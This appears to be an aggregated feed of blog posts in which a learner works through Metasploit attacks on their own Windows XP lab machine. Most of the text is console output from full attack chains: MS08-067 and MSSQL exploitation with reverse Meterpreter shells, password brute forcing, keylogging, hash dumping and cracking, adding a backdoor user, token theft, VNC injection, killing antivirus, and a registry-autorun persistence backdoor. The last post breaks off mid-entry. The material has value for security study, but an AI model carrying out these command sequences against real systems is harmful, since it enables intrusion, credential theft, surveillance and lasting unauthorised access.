Quantcast
Channel: Pax Pentest » Exploit
Viewing all 51 articles
Browse latest View live

Metasploit All-Ports Payloads: Brute Forcing Ports

0
0

I’m targeting ports on the Windows portion of my Virtual Hacking Lab and following instructions given in Chapter 5 (The Joy of Exploitation) of Metasploit: The Penetration Tester’s Guide.

The exploitee system comprises: Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

The object of this is for Metasploit to uncover open ports on the victim machine. My input is in bold:

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3
msf exploit(ms08_067_netapi) > search ports
[!] Database not connected or cache not built, using slow search

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/admin/misc/wol normal UDP Wake-On-Lan (WOL)
auxiliary/admin/natpmp/natpmp_map normal NAT-PMP Port Mapper
auxiliary/admin/postgres/postgres_readfile normal PostgreSQL Server Generic Query
auxiliary/bnat/bnat_router normal BNAT Router
auxiliary/bnat/bnat_scan normal BNAT Scanner
auxiliary/scanner/http/apache_activemq_traversal normal Apache ActiveMQ Directory Traversal
auxiliary/scanner/http/vmware_server_dir_trav normal VMware Server Directory Traversal Vulnerability
auxiliary/scanner/http/wordpress_pingback_access normal WordPress Pingback Locator
auxiliary/scanner/misc/zenworks_preboot_fileaccess normal Novell ZENworks Configuration Management Preboot Service Remote File Access
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP “XMas” Port Scanner
auxiliary/scanner/rservices/rexec_login normal rexec Authentication Scanner
auxiliary/scanner/rservices/rlogin_login normal rlogin Authentication Scanner
auxiliary/scanner/rservices/rsh_login normal rsh Authentication Scanner
auxiliary/scanner/scada/digi_realport_serialport_scan normal Digi RealPort Serial Server Port Scanner
auxiliary/scanner/snmp/snmp_enum normal SNMP Enumeration Module
auxiliary/scanner/vnc/vnc_login normal VNC Authentication Scanner
auxiliary/server/capture/mssql normal Authentication Capture: MSSQL
auxiliary/server/http_ntlmrelay normal HTTP Client MS Credential Relayer
exploit/linux/http/alcatel_omnipcx_mastercgi_exec 2007-09-09 manual Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution
exploit/multi/browser/java_rhino 2011-10-18 excellent Java Applet Rhino Script Engine Remote Code Execution
exploit/multi/misc/hp_vsa_exec 2011-11-11 excellent HP StorageWorks P4000 Virtual SAN Appliance Command Execution
exploit/multi/misc/java_rmi_server 2011-10-15 excellent Java RMI Server Insecure Default Configuration Java Code Execution
exploit/windows/browser/adobe_flash_sps 2011-08-09 normal Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
exploit/windows/browser/crystal_reports_printcontrol 2010-12-14 normal Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow
exploit/windows/browser/ms10_018_ie_tabular_activex 2010-03-09 good Internet Explorer Tabular Data Control ActiveX Memory Corruption
exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec 2010-06-09 excellent Microsoft Help Center XSS and Command Execution
exploit/windows/browser/ms11_093_ole32 2011-12-13 normal MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution
exploit/windows/browser/ms12_004_midi 2012-01-10 normal MS12-004 midiOutPlayNextPolyEvent Heap Overflow
exploit/windows/browser/ms12_037_same_id 2012-06-12 normal MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption
exploit/windows/browser/tom_sawyer_tsgetx71ex552 2011-05-03 normal Tom Sawyer Software GET Extension Factory Remote Code Execution
exploit/windows/fileformat/openoffice_ole 2008-04-17 normal OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow
exploit/windows/fileformat/ursoft_w32dasm 2005-01-24 good URSoft W32Dasm Disassembler Function Buffer Overflow
exploit/windows/http/apache_mod_rewrite_ldap 2006-07-28 great Apache module mod_rewrite LDAP protocol Buffer Overflow
exploit/windows/http/ca_totaldefense_regeneratereports 2011-04-13 excellent CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection
exploit/windows/http/savant_31_overflow 2002-09-10 great Savant 3.1 Web Server Overflow
exploit/windows/misc/allmediaserver_bof 2012-07-04 normal ALLMediaServer 0.8 Buffer Overflow
exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great Microsoft SQL Server Database Link Crawling Command Execution
exploit/windows/mssql/mssql_payload_sqli 2000-05-30 excellent Microsoft SQL Server Payload Execution via SQL Injection
exploit/windows/novell/zenworks_preboot_op4c_bof 2012-02-22 normal Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow
exploit/windows/novell/zenworks_preboot_op6c_bof 2012-02-22 normal Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow
exploit/windows/scada/scadapro_cmdexe 2011-09-16 excellent Measuresoft ScadaPro <= 4.0.0 Remote Command Execution
exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual Microsoft Workstation Service NetpManageIPCConnect Overflow
payload/windows/dllinject/reverse_tcp_allports normal Reflective DLL Injection, Reverse All-Port TCP Stager
payload/windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
payload/windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
payload/windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
payload/windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
payload/windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
payload/windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
post/linux/gather/checkvm normal Linux Gather Virtual Environment Detection
post/linux/gather/enum_network normal Linux Gather Network Information
post/solaris/gather/checkvm normal Solaris Gather Virtual Environment Detection
post/windows/gather/checkvm normal Windows Gather Virtual Environment Detection
post/windows/manage/clone_proxy_settings normal Windows Manage Proxy Setting Cloner

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp_allports
PAYLOAD => windows/meterpreter/reverse_tcp_allports
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.70:1
msf exploit(ms08_067_netapi) > [*] Attempting to trigger the vulnerability…
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:1 -> 192.168.1.79:1053) at 2013-06-06 10:09:59 +0100

msf exploit(ms08_067_netapi) > sessions -1 -v

Active sessions
===============

Id Type Information Connection Via
– —- ———– ———- —
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ LAB 192.168.1.70:1 -> 192.168.1.79:1053 (192.168.1.79) exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1…

meterpreter >

This line:

[*] Meterpreter session 1 opened (192.168.1.70:1 -> 192.168.1.79:1053) at 2013-06-06 10:09:59 +0100

Shows me that my attacking machine is using port 1053 on the victim machine.


Metasploit: Exploiting MS SQL Server: Fast-Track, mssql_ping, mssql_login, mssql_payload, Meterpreter Shell

0
0

I’m targeting the MS MSQL Server on the Windows portion of my Virtual Hacking Lab and following instructions given in Chapter 6 (Meterpreter) of Metasploit: The Penetration Tester’s Guide.

The exploitee system comprises: Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

Fist step: Nmap scan from within Metasploit: The pertinent results for this exploit are:

1433/tcp open  ms-sql-s      Microsoft SQL Server 2005 9.00.1399.00

Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003

Interestingly, Nmap couldn’t definitively identify which Windows Servce Pack, but of course I know it’s Service Pack 2.

MS SQL is installed by default on TCP port 1433 and UDP port 1434, so I need to confirm port 1434:

nmap -sU 192.168.1.79 -p1434

PORT STATE SERVICE
1434/udp open|filtered ms-sql-m

And the scan confirms this.

Now to use Metasploit mssql_ping to pick up more information:

msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > exploit

[*] SQL Server information for 192.168.1.79:
[+] ServerName = LAB
[+] InstanceName = SQLEXPRESS
[+] IsClustered = No
[+] Version = 9.00.1399.06
[+] tcp = 1433
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Lots of information here, now to brute force MS SQL with mssql_login:

>msf > use scanner/mssql/mssql_login
msf auxiliary(mssql_login) > set PASS_FILE /usr/share/set/src/fasttrack/wordlist.txt
PASS_FILE => /usr/share/set/src/fasttrack/wordlist.txt
msf auxiliary(mssql_login) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_login) > set THREADS 10
THREADS => 10
msf auxiliary(mssql_login) > exploit

[+] 192.168.1.79:1433 – MSSQL – successful login ‘sa’ : ‘password1′

MS SQL password and login successfully guessed.

Now to use the mssql_payload which exploits xp_cmdshell:

msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(mssql_payload) > set LPORT 443
LPORT => 443
msf exploit(mssql_payload) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(mssql_payload) > set PASSWORD password1
PASSWORD => password1
msf exploit(mssql_payload) > exploit

[*] Started reverse handler on 192.168.1.70:443
[*] The server may have xp_cmdshell disabled, trying to enable it…
[*] Command Stager progress – 1.47% done (1499/102246 bytes)

[....]

[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Command Stager progress – 100.00% done (102246/102246 bytes)
[*] Meterpreter session 1 opened (192.168.1.70:443 -> 192.168.1.79:1293) at 2013-06-13 10:39:46 +0100

meterpreter >

So I’m inside the target machine with the Meterpreter shell.

In my next post I will explore what to do next with Meterpreter.

Metasploit Meterpreter Shell: Screenshot, sysinfo, ps, migrate, keylog_recorder

0
0

This post follows on from the previous post within which a target machine was exploited and a Meterpreter shell obtained.

First to export an image of the target machine’s desktop:

meterpreter > screenshot
Screenshot saved to: /root/hikMIGNN.jpeg

And here’s the result:

hacked_desktop

I mus say seeing this was rather satisfying.

And now for system information:

meterpreter > sysinfo
Computer : LAB
OS : Windows XP (Build 2600, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32

Perfect.

Listing the processes:

meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
— —- —- —- ——- —- —-
0 0 [System Process] 4294967295
4 0 System x86 0 NT AUTHORITY\SYSTEM
544 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
572 1032 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
596 1032 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
668 1032 inetinfo.exe

[...]

1820  1772  explorer.exe              x86   0           LAB\Lab1                      C:\WINDOWS\Explorer.EXE

Now to “migrate” to explorer.exe:

meterpreter > migrate 1820
[*] Migrating from 3740 to 1820…
[*] Migration completed successfully.

Time for keystroke logging:

meterpreter > run post/windows/capture/keylog_recorder

[*] Executing module against LAB
[*] Starting the keystroke sniffer…
[*] Keystrokes being saved in to /root/.msf4/loot/20130613112010_default_192.168.1.79_host.windows.key_330924.txt
[*] Recording keystrokes…
^C[*] Saving last few keystrokes…
[*] Interrupt
[*] Stopping keystroke sniffer…

Whilst the keystroke logger was running I typed a few things on the target machine, and so in a new terminal, let’s see if the keystrokes have been logged:

:~# cat /root/.msf4/loot/20130613112010_default_192.168.1.79_host.windows.key_330924.txt
Keystroke log started at 2013-06-13 11:20:10 +0100
OK this search on Google is
to determine if the Metas
ploit keyy <Back> logger is wo
rking <Back> <Return> <Return> Is any of
this being typed in Notepad
being recorded on the attacki <Back>
ng machine? <Return> <Return> Don’t know yet
, but will find out in a min! <Return> <Return>

Success, every keystroke on the target machine has indeed been recorded on the attacking machine.

Metasploit Meterpreter: Dumping Username and Password Hashes – hashdump

0
0

This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

And so to the Meterpreter:

meterpreter > use priv <– To run as privileged account
[-] The ‘priv’ extension has already been loaded.
meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY ec2d41aa4579441e29ff2f7c166c0a22…
[*] Obtaining the user list and keys…
[*] Decrypting user keys…
[*] Dumping password hints…

No users with password hints on this system

[*] Dumping password hashes…
Administrator:500:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:6b07ba3b4d75aa51838b0cfdc86c8df3:e45fffac3de66133d18d22904c5826cf:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0eed33aba5c1d0b4380877fc6a9d3782:::
Lab1:1003:120fafeb2e7c7e58944e2df489a880e4:e653e6452753c97e46792567dff599b6:::
IUSR_LAB:1004:62370555cf8f248a0e09beb9498d8aef:e3f63f5c44a2d1b51f41605f8b393f9a:::
IWAM_LAB:1005:f36ec01c239defaaf55c7c89733523b1:5a0701b3aada738fcca9bec7d5de30a5:::
ASPNET:1006:7287a164a7e06a495f8d3fe3df15c6f4:44919150091298dd9585de0e598750a2:::
__vmware_user__:1013:aad3b435b51404eeaad3b435b51404ee:bb971f73d6fd552502d31ee0ba49d197:::

Hash beginning aad3b435 is an empty string.

I copied the Administrators Windows LAN Manger (LM) password hash (81cbcea8a9af93bbaad3b435b51404ee) and decrypted it, and was rewarded with “S3CR3T” which is indeed the correct password!

I did the same as above with the LAB1 LM hash (120fafeb2e7c7e58944e2df489a880e4) on a different website as the first website website was unable to decrypt it, and again was rewarded with “WHATEVER” which is the correct password.

Interestingly, when I entered the second password hash (NTLM) of LAB1 (e653e6452753c97e46792567dff599b6) the first website decrypted it fine.

In the output above it’s noted: “No users with password hints on this system” and so I set a “hint” and reran the scan:

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY ec2d41aa4579441e29ff2f7c166c0a22…
[*] Obtaining the user list and keys…
[*] Decrypting user keys…
[*] Dumping password hints…

Lab1:”My feet smell”

And there’s the password hint: ”My feet smell”

Metasploit Meterpreter: Creating a new user in an exploited Windows XP System

0
0

This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

The first step is “migrate” to explorer.exe as was achieved in a previous post

meterpreter > migrate 2028

[*] Migrating from 3180 to 2028…
[*] Migration completed successfully.

Now to create a new user on the exploited Windows system:

meterpreter > shell
Process 3092 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Lab1>net user bob password123 /add

Result:

net user bob password123 /add
The command completed successfully.

And here’s a screenshot taken from the attacking machine:

adding_user

And there is the new user “Bob” created entirely from the hacking machine.

 

Metasploit: Pass the Hash – windows/smb/psexec

0
0

Probably my favourite blog title so far.

Following on from the Hashdump post in which I obtained the Windows passwords in the form of hashes and then decrypted them for the password, the following uses the hashes to login without the need for decryption:

msf > use windows/smb/psexec
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(psexec) > set LPORT 443
LPORT => 443
msf exploit(psexec) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(psexec) > set SMBPass 120fafeb2e7c7e58944e2df489a880e4:e653e6452753c97e46792567dff599b6
SMBPass => 120fafeb2e7c7e58944e2df489a880e4:e653e6452753c97e46792567dff599b6
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.1.70:443
[*] Connecting to the server…
[*] Authenticating to 192.168.1.79:445|WORKGROUP as user ”…
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)

As you can see this completely failed, which did not take me by surprise since every time I have attempted to use the SMB command against this Windows system, it has failed.

No idea why.

Metasploit Meterpreter: Using ps and stealing Kerberos tokens

0
0

This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

meterpreter > ps <–Lists applications running

Process List
============

PID PPID Name Arch Session User Path
— —- —- —- ——- —- —-
0 0 [System Process] 4294967295
4 0 System x86 0 NT AUTHORITY\SYSTEM
192 1032 snmp.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\snmp.exe
468 1032 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
512 1032 vmnat.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\vmnat.exe
536 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
580 1032 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
588 1032 vmnetdhcp.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\vmnetdhcp.exe
680 1032 vmware-authd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Player\vmware-authd.exe
696 1032 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
788 128 explorer.exe x86 0 LAB\Lab1 C:\WINDOWS\Explorer.EXE
860 536 wscntfy.exe x86 0 LAB\Lab1 C:\WINDOWS\system32\wscntfy.exe
892 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
964 892 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
988 892 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
1032 988 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
1044 988 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
1216 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1272 1032 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1436 988 logon.scr x86 0 LAB\Lab1 C:\WINDOWS\System32\logon.scr
1460 1032 sqlbrowser.exe x86 0 NT AUTHORITY\SYSTEM c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
1508 1032 vmware-usbarbitrator.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\VMware\USB\vmware-usbarbitrator.exe
1652 1032 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1928 1032 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe
1968 1032 sqlservr.exe x86 0 NT AUTHORITY\SYSTEM c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
2080 788 hqtray.exe x86 0 LAB\Lab1 C:\Program Files\VMware\VMware Player\hqtray.exe
2424 2396 ACpwO.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\ACpwO.exe
3376 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe

I’ve decided to steal the PID token for the user LAB1 (1436 988 logon.scr x86 0 LAB\Lab1 C:\WINDOWS\System32\logon.scr)

Meterpreter > steal_token 1436
Stolen token with username: LAB\Lab1

I believe I have now assumed the role of LAB1 and Meterpreter is running under the context of that user.

 

Metasploit Meterpreter: Run VNC

0
0

This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

This is very cool. The following installs a VNC session on the exploited Windows system and gives me a graphical interface window of the target desktop to manipulate as if I were sitting at the machine.

meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.70 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\nMsMIPZFPZ.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.70:4545…
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name “lab”
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

And up popped the target machine desktop:

meterpreter_vnc


Metasploit Meterpreter: Sniffing traffic on exploited system – Packetrecorder

0
0

This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

meterpreter > run packetrecorder -i 1
[*] Starting Packet capture on interface 1
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/LAB_20130625.5807/LAB_20130625.5807.cap
[*] Packet capture interval is 30 Seconds

^C <– Control +C to stop the process
[*] Interrupt
[+] Stopping Packet sniffer…
meterpreter >

The file is saved in the folder .MSF4, which is a hidden folder in Kali within Root.

Rather conveniently, everything logged by Packetrecorder is saved in the .pcap file format which is perfect for Wireshark:

packetrecorder

And 192.168.1.79 is the IP of the target machine.

Metasploit Meterpreter: Creating a persistent backdoor connection

0
0

This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

The following Meterpreter persistence script ensures access to the exploited system even after a reboot. This script comes with a warning

One word of warning here before we go any further. The persistent Meterpreter as shown here requires no authentication. This means that anyone that gains access to the port could access your back door! This is not a good thing if you are conducting a penetration test, as this could be a significant risk. In a real world situation, be sure to exercise the utmost caution and be sure to clean up after yourself when the engagement is done.

Here’s the Persistence options:

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

-A Automatically start a matching multi/handler to connect to the agent
-L <opt> Location in target host where to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on the remote host where Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back

On to the Meterpreter script:

meterpreter > run persistence -X -i 50 -p 443 -r 192.168.1.79
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/LAB_20130625.2221/LAB_20130625.2221.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.79 LPORT=443
[*] Persistent agent script is 611063 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\urMouyzhUqndV.vbs
[*] Executing script C:\WINDOWS\TEMP\urMouyzhUqndV.vbs
[+] Agent executed with PID 2520
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TgZcTlqTJNmSbP
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TgZcTlqTJNmSbP
meterpreter >

I have rebooted the target machine and will now to test the connection from Metasploit.

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set LHOST 192.168.1.79
LHOST => 192.168.1.79
msf exploit(handler) > exploit

[-] Handler failed to bind to 192.168.1.79:443
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler…

And it stuck there.

No idea why this didn’t work.

Metasploit Meterpreter: Migrate a process and obtain system password hashes

0
0

This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

I attempted to obtain the password hashes from the exploited system:

meterpreter > run hashdump
[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY ec2d41aa4579441e29ff2f7c166c0a22…
[*] Obtaining the user list and keys…
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_query_value: Operation failed: The handle is invalid.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)

But this failed and hinted that I should migrate into service process, which I did:

meterpreter > run post/windows/manage/migrate

[*] Running module against LAB
[*] Current server process: ALqkE.exe (3740)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3672
[+] Successfully migrated to process 3672

After which run hashdump worked perfectly.

I have blogged on obtaining the password hashes previously.

Metasploit Meterpreter: Killing Antivirus Software on Exploited System – Killav

0
0

This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

The following disables most antivirus programs:

meterpreter > run killav
[*] Killing Antivirus services on the target…
meterpreter >

Simple as that.

Metasploit: Listing Meterpreter Post Exploitation Modules

0
0

This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

Great way to view Meterpreter post exploitation modules is: “run post/” followed by the tab key:

meterpreter > run post/
Display all 144 possibilities? (y or n)
run post/multi/gather/apple_ios_backup
run post/multi/gather/dns_bruteforce
run post/multi/gather/dns_reverse_lookup
run post/multi/gather/dns_srv_lookup
run post/multi/gather/enum_vbox
run post/multi/gather/env
run post/multi/gather/filezilla_client_cred
run post/multi/gather/find_vmx
run post/multi/gather/firefox_creds
run post/multi/gather/multi_command
run post/multi/gather/pgpass_creds
run post/multi/gather/pidgin_cred
run post/multi/gather/ping_sweep
run post/multi/gather/run_console_rc_file
run post/multi/gather/skype_enum
run post/multi/gather/thunderbird_creds
run post/multi/general/close
run post/multi/general/execute
run post/multi/manage/multi_post
run post/multi/manage/record_mic
run post/windows/capture/keylog_recorder
run post/windows/capture/lockout_keylogger
run post/windows/escalate/bypassuac
–More–

Metasploit Meterpreter Railgun: Post Exploit Windows API Manipulation

0
0

Metasploit: The Penetration Tester’s Guide has this to say about Railgun:

You can interface with the Windows native API directly through a Metasploit add-on called Railgun.

[....]

Railgun gives you the same capabilities as a native Win32 application with full access to the Windows API.

Here’s Wiki on Native API:

The Native API (with capitalized N) is the mostly undocumented application programming interface (API) used internally by the Windows NT family of operating systems produced by Microsoft.[1] It is predominately used during system boot, when other components of Windows are unavailable, and by routines such as those in kernel32.dll that implement the Windows API. The program entry point is called DriverEntry(), the same as for a Windows device driver. However, the application runs in ring 3 the same as a regular Windows application. Most of the Native API calls are implemented in ntoskrnl.exe and are exposed to user mode by ntdll.dll. Some Native API calls are implemented in user mode directly within ntdll.dll.

While most of Microsoft Windows is implemented using the documented and well-defined Windows API, a few components, such as the Client/Server Runtime Subsystem, are implemented using the Native API, as they can be started earlier in the Windows NT Startup Process when the Windows API is not yet available.

Some malware make use of the Native API to hide their presence from malware detection software.

Railgun operates through an Interactive Ruby Shell within Meterpreter which is cool as I’m learning Ruby. I followed instructions given in the above book to create a pop-up on an exploited Windows machine which calls the user32.dll and MessageBoxA function.

Details of the exploited machine are:

